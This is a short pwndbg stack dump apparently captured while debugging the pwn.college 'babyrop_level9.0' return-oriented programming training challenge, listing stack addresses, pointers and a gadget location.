─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────00:0000│ rsp 0x7fff4c2cfcb8 —▸ 0x4016ab (print_gadget+498) ◂— leave01:0008│ 0x7fff4c2cfcc0 —▸ 0x7fff4c2cfdf8 —▸ 0x7fff4c2d0635 ◂— '/home/cub3y0nd/Projects/pwn.college/babyrop_level9.0'02:0010│ 0x7fff4c2cfcc8 ◂— 0x14c2cfdf803:0018│ 0x7fff4c2cfcd0 —▸ 0x7fff4c2cfd70 —▸ 0x7fff4c2cfdd0 ◂— 004:0020│ 0x7fff4c2cfcd8 —▸ 0x7d78a4634e08 ◂— mov edi, eax05:0028│ 0x7fff4c2cfce0 —▸ 0x7fff4c2cfd20 —▸ 0x7d78a4fd4000 (_rtld_global) —▸ 0x7d78a4fd52e0 ◂— 006:0030│ 0x7fff4c2cfce8 —▸ 0x7fff4c2cfdf8 —▸ 0x7fff4c2d0635 ◂— '/home/cub3y0nd/Projects/pwn.college/babyrop_level9.0'07:0038│ 0x7fff4c2cfcf0 ◂— 0x100400040